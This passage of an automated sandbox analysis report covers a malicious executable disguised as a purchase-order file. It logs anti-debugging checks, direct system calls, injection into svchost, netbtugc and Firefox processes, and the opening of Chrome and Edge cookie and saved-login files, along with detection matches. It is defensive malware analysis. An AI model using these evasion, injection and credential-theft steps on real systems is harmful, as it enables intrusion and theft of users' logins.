            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]2_2_034BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]2_2_034BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]2_2_034B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]2_2_034C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]2_2_034C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]2_2_034649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]2_2_034FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]2_2_034BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]2_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]2_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]2_2_03460854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]2_2_034BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001A0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_001A0B62
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_00172622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00172622
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_0016083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0016083F
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001609D5 SetUnhandledExceptionFilter,0_2_001609D5
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_00160C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00160C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 5916Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeJump to behavior
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 281E008Jump to behavior
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001A1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_001A1201
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_00182BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00182BA5
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001AB226 SendInput,keybd_event,0_2_001AB226
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001C22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_001C22DA
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-DOC1522025-12.exe"Jump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001A0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_001A0B62
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001A1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_001A1663
            Source: PO-DOC1522025-12.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000002.4620975139.0000000001030000.00000002.00000001.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000000.2221464953.0000000001030000.00000002.00000001.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4621693562.0000000000F30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: PO-DOC1522025-12.exe, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000002.4620975139.0000000001030000.00000002.00000001.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000000.2221464953.0000000001030000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000002.4620975139.0000000001030000.00000002.00000001.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000000.2221464953.0000000001030000.00000002.00000001.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4621693562.0000000000F30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000002.4620975139.0000000001030000.00000002.00000001.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000000.2221464953.0000000001030000.00000002.00000001.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4621693562.0000000000F30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_00160698 cpuid 0_2_00160698
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001B8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_001B8195
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_0019D27A GetUserNameW,0_2_0019D27A
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_0017B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0017B952
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001442DE

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4623753235.0000000004BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2299849975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4621727339.0000000000870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2301133615.0000000006990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4615833693.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4621737352.0000000005960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: PO-DOC1522025-12.exeBinary or memory string: WIN_81
            Source: PO-DOC1522025-12.exeBinary or memory string: WIN_XP
            Source: PO-DOC1522025-12.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 